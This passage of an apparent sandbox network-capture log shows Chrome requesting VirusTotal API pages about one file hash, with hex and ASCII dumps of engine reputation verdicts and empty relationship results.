                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 30 78 53 49 5f 66 33 33 64 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 30 78 53 49 5f 66 33 33 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c
                                                                                                                                                                                                                    Data Ascii: "result": "clean" }, "0xSI_f33d": { "method": "blacklist", "engine_name": "0xSI_f33d", "category": "undetected", "resul
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC542INData Raw: 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 6c 69 65 6e 56 61 75 6c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 61 6c 70 68 61 4d 6f 75 6e 74 61 69 6e 2e 61 69 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "engine_name": "AlienVault", "category": "harmless", "result": "clean" }, "alphaMountain.ai": { "method": "blacklist",
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63 74 65 64 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 41 6e 74 69 79 2d 41 56 4c 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 41 6e 74 69 79 2d 41 56 4c 22 2c 0a 20 20 20
                                                                                                                                                                                                                    Data Ascii: "category": "undetected", "result": "unrated" }, "Antiy-AVL": { "method": "blacklist", "engine_name": "Antiy-AVL",
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 42 69 74 44 65 66 65 6e 64 65 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 42 69 74 44 65 66 65 6e 64 65 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c
                                                                                                                                                                                                                    Data Ascii: }, "BitDefender": { "method": "blacklist", "engine_name": "BitDefender", "category": "harmless", "result": "clean" },
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1280INData Raw: 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 6c 75 73 74 65 72 32 35 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 6c 75 73 74 65 72 32 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 75 6e 64 65 74 65 63
                                                                                                                                                                                                                    Data Ascii: "harmless", "result": "clean" }, "Cluster25": { "method": "blacklist", "engine_name": "Cluster25", "category": "undetec
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 75 6e 72 61 74 65 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 43 79 62 6c 65 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 43 79 62 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: ", "result": "unrated" }, "Cyble": { "method": "blacklist", "engine_name": "Cyble", "category": "harmless",
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 45 53 54 73 65 63 75 72 69 74 79 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 53 54 73 65 63 75 72 69 74 79 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "category": "harmless", "result": "clean" }, "ESTsecurity": { "method": "blacklist", "engine_name": "ESTsecurity",
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1280INData Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 47 2d 44 61 74 61 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 47 6f 6f 67 6c 65 20 53 61 66 65 62 72 6f 77 73 69 6e 67 22
                                                                                                                                                                                                                    Data Ascii: ": { "method": "blacklist", "engine_name": "G-Data", "category": "harmless", "result": "clean" }, "Google Safebrowsing"
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC1408INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 6d 65 74 68 6f 64 22 3a 20 22 62 6c 61 63 6b 6c 69 73 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 65 6e 67 69 6e 65 5f 6e 61 6d 65 22 3a 20 22 49 50 73 75 6d 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 63 61 74 65 67 6f 72 79 22 3a 20 22 68 61 72 6d 6c 65 73 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 72 65 73 75 6c 74 22 3a 20 22 63 6c 65 61 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4a 75 6e 69 70 65 72 20 4e 65 74 77 6f 72 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                    Data Ascii: "method": "blacklist", "engine_name": "IPsum", "category": "harmless", "result": "clean" }, "Juniper Networks": {


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    209192.168.2.164996974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC550OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 11b2271b0068545e6e82126673ac42dd
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    210192.168.2.164996874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC961OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTAyMDQwMjIxOTYtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: b9d9172e493e46faaee5d52fac52be2c
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 226
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:57 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC226INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 65 78 65 63 75 74 69 6f 6e 5f 70 61 72 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/execution_parents?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    211192.168.2.164996674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC963OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTY0MjE5OTA2MjMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 1aa1870b7082c63c1d36d89d1d154e73
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 228
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:58 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:58 UTC228INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 5d 2c 0a 20 20 20 20 22 6d 65 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 75 6e 74 22 3a 20 30 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 37 36 66 39 38 33 32 31 66 35 30 35 39 35 37 32 35 66 36 34 66 30 35 38 64 38 66 33 33 31 30 33 64 35 31 38 63 35 64 37 37 36 38 30 66 64 37 64 35 35 32 31 63 34 31 37 38 36 32 39 39 33 35 38 2f 70 65 5f 72 65 73 6f 75 72 63 65 5f 70 61 72 65 6e 74 73 3f 6c 69 6d 69 74 3d 31 30 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": [], "meta": { "count": 0 }, "links": { "self": "https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents?limit=10" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    212192.168.2.164997074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:57 UTC957OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTY2OTQ4MTg3ODMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTU1LjQwNw==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 75cc006526b7bc415e7424d63c005b83
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 478377
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:59 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:59 UTC522INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 5b 0a 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 65 32 63 32 38 33 34 33 38 65 35 66 39 32 33 36 63 35 63 62 32 65 36 62 38 62 39 35 63 61 37 38 64 35 32 30 66 37 62 37 37 36 64 36 34 61 30 35 30 36 36 34 39 37 32 63 62 35 31 30 37 36 66 35 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 66 69 6c 65 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 66 69 6c 65 73 2f 65 32 63 32 38 33 34 33 38 65 35 66 39 32 33 36 63 35 63 62 32 65 36 62 38 62 39 35 63 61 37
                                                                                                                                                                                                                    Data Ascii: { "data": [ { "id": "e2c283438e5f9236c5cb2e6b8b95ca78d520f7b776d64a050664972cb51076f5", "type": "file", "links": { "self": "https://www.virustotal.com/ui/files/e2c283438e5f9236c5cb2e6b8b95ca7
